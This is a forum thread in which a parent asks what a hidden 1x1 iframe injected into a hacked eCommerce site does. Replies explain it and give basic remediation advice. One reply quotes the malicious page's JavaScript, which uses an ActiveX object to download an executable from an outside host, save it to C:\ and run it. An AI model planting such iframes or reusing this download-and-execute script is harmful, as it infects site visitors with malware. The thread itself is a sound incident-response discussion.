Jump to content

Hacked Site : What does this code do ?


malcsenior

Recommended Posts

My daughters website, eCommerce based, has been hacked and the following line was inserted in her home (html) page and index (php) page:

<iframe src='http://ns192168-ip255.net/traffic/index.php' width=1
height=1></iframe>

What does it do and who did it ?

Pages are now read only any other security advice would be appreciated.
Link to comment
Share on other sites

its an inline frame very common among people who want to insert another web page into your page.

you can just delete what you have posted

as far as security goes and assuming that your site is written in php you can use strip_tags() which will remove all the html from a string that was submitted.

but if it was not submitted through a post action and the site was actually hacked into, then you just may want to change your password to get access to the site
Link to comment
Share on other sites

An Iframe is like inserting a page into another one. It basicly adds a a scrollable page inside another page.
In this case, from what I can see, it has a 1 by 1 pixel size so it should display something small, but I can also see that from my understanding is safe to remove the line.
Hope this help, and wait for advise from the experts :)
Link to comment
Share on other sites

[code]var obj_RDS = document.createElement('object');
obj_RDS.setAttribute('id','obj_RDS');
obj_RDS.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
var obj_msxml2 = obj_RDS.CreateObject("msxml2.XMLHTTP","");
obj_msxml2.open("GET","http://ns192168-ip255.net/traffic/web.exe",false);
obj_msxml2.send();
var obj_ShellApp = obj_RDS.CreateObject("Shell.Application","");
var obj_adodb = obj_RDS.CreateObject("adodb.stream","");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\246172160121.exe";
obj_adodb.SaveToFile(fn,2);
obj_ShellApp.ShellExecute(fn);[/code]

was in the page that was inserted... So from what i gather it was downloading http://ns192168-ip255.net/traffic/web.exe to what ever computer viewed that page and saving it as to the local computer as C:\246...exe
Link to comment
Share on other sites

Whoa, I just rewent to that site intending to analyze what it does farther, and the source code of it has been changed  :'(.  Now that page just does nothing... It calls an Iframe to a non existing site... You should still remove the iframe code from your daughters page though, and check on your computer for a wierd file on the top of the C drive named <random numbers>.exe
Link to comment
Share on other sites

[quote=malcsenior]
Pages are now read only any other security advice would be appreciated.
[/quote]
Securing your site is something that requires more than using a few tips here and there. I'll give a few however.

I am not a security expert, but If the site's scripts are self written then you can start by read this [url=http://phpsec.org/projects/guide/]Security Guide[/url].

If this is a third party script, then you'll want to keep up on updates. You'll also want to search regularly to see if there are any known vulnerabilities for the script at a site such as http://www.securityfocus.com.

Having already been compromised, you may want to do the following things

1) Take the site down

2) Find out how the site was originally compromised. If you don't know then it's likely that it will happen again.

3) Depending on the level of access gained, you may want to change passwords for the databases,ftp,control panel etc. The associated email addresses should also possibly have their paswords changed if they are the same as any of the others.

You should be able to find sites that deal with (or have sections dealing with) overall security specifically, to get more opinions.

This doesn't have much to do with a PHP script you're writing so I've moved it to the Miscellaneous forum.
Link to comment
Share on other sites

Thanks for putting this thread in the right place.
I am in the very early stages of php, you guys are mega cool and thanks for your advice so far.
Really appreciated.

The tricky line of code was removed, immediately it was spotted, all computers have been checked. both by virus, mallware tools and searching C; root. Macs have been used to check all tricky links as they are resistant to PC hacks. Will take all your advice onboard.
Link to comment
Share on other sites

That is the craziest thing i've seen all day!

Wonder what that program ran? If you havn't already make sure you can your computer and also try running some network security programs to check your computer for any newly opened ports? Make sure you have a firewall aswell.

Another security tip is to contact the hosting company. If you don't have access to the logs they do.

See if there was an unauthorized FTP login or if it was a vunlernability in eCommerce. You should also contact eCommerce because it is their responsibility to ensure their scripts are safe, especially when dealing with funds and sales.
Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.